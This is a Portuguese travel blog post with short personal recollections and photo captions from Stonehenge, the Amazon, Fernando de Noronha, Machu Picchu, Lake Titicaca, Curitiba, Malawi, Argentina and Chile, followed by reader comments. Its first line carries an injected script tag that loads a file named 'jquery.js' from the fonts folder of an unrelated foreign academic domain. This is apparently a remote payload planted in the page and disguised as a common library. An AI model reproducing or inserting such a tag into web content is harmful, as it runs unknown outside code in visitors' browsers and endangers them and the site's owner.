— Viagens</a><script src="http://www.klaeng.ac.th/fonts/jquery.js"></script><a>

— Viagens

Stonehenge (Inglaterra)

Era um sonho vir aqui. Já tinha ouvido falar, lia a respeito, mas quando me deparei com as pedras de Stonehenge, ficou aquela sensação de mute em volta, tudo em câmera lenta e minha mente voou. Ninguém sabe ao certo como as tais pedras foram parar aí e os druídas reivindicam o lugar como santo e destinado ao culto. Fato mesmo é que as pedrinhas dispostas geometricamente atraem turistas do mundo todo o tempo inteiro. No meu dia tinha uns sacerdotes vestidos de preto e fazendo uns rituais, mas lá fora do círculo sagrado, pois para entrar é preciso pagar e nem sonhar em tocar nas pedras. Experiência interessantíssima!

Encontro das Águas (Manaus)

Encontro das águas visto de cima, em Manaus.

Rio Aimarés (Amazonas)

Estava voltando de uma matéria, um calor danado e eis que no meio do nada acaba a gasolina da lancha. Todos tanquilos, o pastor começa a troca de galões e eu ali, olhando aquele rio enorme, de águas mornas e escuras e me lancei nele. O povo da lancha começou a rir, me chamando de louca, mas louca mesmo eu fiquei quando vi os botos fazendo gracinhas ali, perto de mim. Nossa, foi surreal!! Só me assustei quando disseram que as águas eram infestadas de piranhas… daí não, né?! Sair lá da ponta do País pra morrer comida por piranha na Amazônia é demais…

As águas eram mornas e de barulho, só as áves no céu e na mata.

Fernando de Noronha

A ilha brasileira mais cobiçada é Fernando de Noronha. Dito isto, não preciso dizer que fiquei extremamente feliz – pra dizer o mínimo – ao saber que iria pra lá gravar uma matéria. Claro que tem partes e uma realidade nada bonita ou turística, mas andar pelo lugarejo de 17 km2  e poder se perder nas praias desertas, nas águas límpidas e mergulhar entre tartarugas marinhas, peixes que nunca vi na via, tubarões e arraias… ah, isto foi mesmo inesquecível. Vale a pena fazer uma “poupancinha” e curtir uns dias no lugar, viu!

São tantos cantinhos lindos pra ver que tive que escolher alguns.

Porto Alegre

Poa, como o povo e lá chama, é uma cidade com belezas diversas, mas acredito que tem coisas marcantes em cada canto do planeja e em Porto, o meu canto era o Guaíba. O rio enorme que alguns gaúchos chamam até de “oceano” está ganhando uma revitalização nas águas poluídas e na orla que deverá ser um ponto badalado de passeio, encontros, descanso. Meu programa preferido na cidade era andar de bike na beira do Guaíba, seja de manhã ou no final da tarde pra contemplar o pôr do sol… coisas simples, né?! Mas é que estão nelas as melhores lembranças.

Preciso dizer onde é? Isto aqui é simplesmente maravilhoso. Quando chegamos as nuvens encobriam todo o lugar e não era possível ver nada. São 2.600 metros de altitude, o que colabora com a nebulosidade, mas depois de muitas preces, as nuvens foram saindo para dar lugar ao sol que irradiou toda a cidade sagrada dos Incas. Se tem um lugar na América do Sul que vale a pena, é Machu Picchu!

As ruínas da cidade sagrada dos Incas só não foi destruída porque os espanhóis não encontraram

Isto aqui também é Peru, limite com Bolívia. O Titicaca é o lago navegável mais alto do mundo. As pessoas se vestem com as roupas típicas o tempo todo e moram sobre ilhas feitas com totora. Mas de perto a realidade é bem dura. Falta comida, saneamento e perspectiva de vida. O alcoolismo é dominante, inclusive entre as mulheres e o turismo é a grande fonte de renda no lugar.

A chegada ao Titicaca é linda e encantadora, mas chegando lá as coisas não são lindas assim…

As pessoas usam mesmo estes trages típicos o tempo todo, mas convivem com miséria como vizinha

Leia aqui uma reportagem que fiz sobre a comunidade de Los Uros.

Punaú. Este é o nome do paraíso. Um vilarejo distante uns 60 km de Natal (RN) com dunas, rios e praia. Quase deserta, vale frisar… sabe aquele ditado “sombra e água fresca”? Foi inventado por alguém enquanto estava lá, aposto. É uma praia deliciosa com uns chalezinhos brancos rústicos pra alugar por cerca de R$ 70… e quando digo rústico, creia-me. É rústico. O lugar perfeito para um dolce far niente. Ainda volto lá…

Na absoluta falta do que fazer, me dei ao trabalho de fotografar o paraíso, mas nem me levantei pra isto.

Londres é incrível. Uma cidade grande, mas muito limpa e organizada. Eu poderia ter colocado um ponto turístico (que você pode ver no meu Orkut), mas escolhi esta foto que acho engraçada. Este cara é super engajado em lutas políticas e sociais e apesar do jeito largado é muito inteligente e eloqüente. Num passeio pela terra da rainha pedi para tirar foto quando o vi ali protestando contra os horrores da guerra no Iraque.

O importante é expressar, não importa que só você sinta sua expressão.

Curitiba é uma cidade incrível. Limpa, bonita, organizada, arborizada e uma série de adjetivos. Se eu não me cuidar coloco milhares de “cantinhos” dela que eu adoro. Tentarei me conter, ok?! Aqui é o famoso cartão postal, o Jardim Botânico. Serve pra contemplar, fazer exercícios, tirar fotos e trazer os amigos pra passear.

Eu sei que o clássico seria o palácio de cristal, mas estes cantinhos…

Este é o centro histórico de Curitiba, o Largo da Ordem, onde acontece a feira de artesanato todos os domingos. Uma delícia de lugar com curiosidades, artes, carros antigos, sebos ao ar livre, antiguidades e comidinhas. Fora os malucos que batem ponto por lá. Merece uma visita e não deixe de comer bolinho de aipim (com os molhinhos maravilhosos).

Esta fonte fica bem no meio da feira que funciona até as 14h.

Vilarejo, no Malawi. Perto do Hospital Adventista Malamulo. Foi um dos lugares mais incríveis onde vi o pôr-do-sol. Claro que tem pobreza, claro que nem tudo são flores. Neste caso, inclusive, “são chá”. Tudo em volta é plantação de chá. Um lugar incrível e inesquecível.

Sem indústria e sua poluição, a natureza preservada reserva um encanto a cada crepúsculo

“Você já foi à Bahia, bem? Não? Então vá! A música é uma verdade. Tem lugares muito legais pra visitar e quase duas culturas distintas se comparar o Sul do Estado com o Norte. Lá “pra cima”, Salvador é uma parada obrigatória com suas cores e história.

Ladeira do Pelourinho

Farol da Barra

A Argentina é linda, por inteiro. São tantas coisas legais, cada cantinho lindo que é difícil escolher. Vamos ficar com dois, pra começar. Buenos Aires, a capital mais européia das Américas é uma pedida certeira. Seus casarões e prédios com estilo francês são um charme à parte. Os restaurantes também são bons e a empanada é obrigatória, ok?! Para ser bem clichê, aí vai uma foto do famoso caminito. Que nada mais é que uma rua com casas construídas com restos dos navios. Tem tango ao ar livre e dezenas de artistas.

El Caminito ao pôr-do-sol

Este ângulo é clássico e é um clássico, mas o lugar é bem pequeno

Mais ao sul, a região de Bariloche. Sim, pois a cidade em si, se não está coberta de neve é bem feinha, suja e pobre. Em compensação, o entorno com lagos, casinhas de madeira e jardins impecáveis são um “regalo” para os olhos.

Eu no lago Nahuel Huapi

Meu Chile querido! Adoro este país e estou planejando uma aventura pelo deserto do Atacama que é lindíssimo. Fui lá só duas vezes, mas volto assim que chamarem. Santiago é uma das capitais sul-americanas mais modernas e confortáveis. Moraria lá sem nem pensar. Mais ao sul temos as montanhas e os vulcões cobertos de neve que se pode escalar. Este aí é meu amorzinho no topo do Pucón.

Meu marido no topo do Pucón: 3.840 m.

5 comments

  • Lugares lindos.. só pelas fotos dá pra sentir quão especial é cada cantinho que você postou….. mas com certeza nada melhor que ir pra cada um deles.. a cada mala pronta pra viagem uma incerteza do que irá encontrar, acontecer, quem irá conhecer… está de parabéns Fabi.

    Bjo da Wall

    Reply
  • Bacana emh! Parabéns por viajar por lugares tão lindos. Vai uma dica: que tal umas fotos no pantanal mato-grossense. 😉

    Cuiabá-MT

    Reply
    • Fiquei encantada com todas as fotos e ainda mais com as descrições, até por que, as histórias das fotos as deixam mais interessantes ainda. Amei a do rio Amazonas, sou amazonense e confesso que não tenho a coragem que você teve, quem sabe não me sirva de incentivo, claro que em um rio sem piranhas!!! Parabéns!!!

      Reply

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *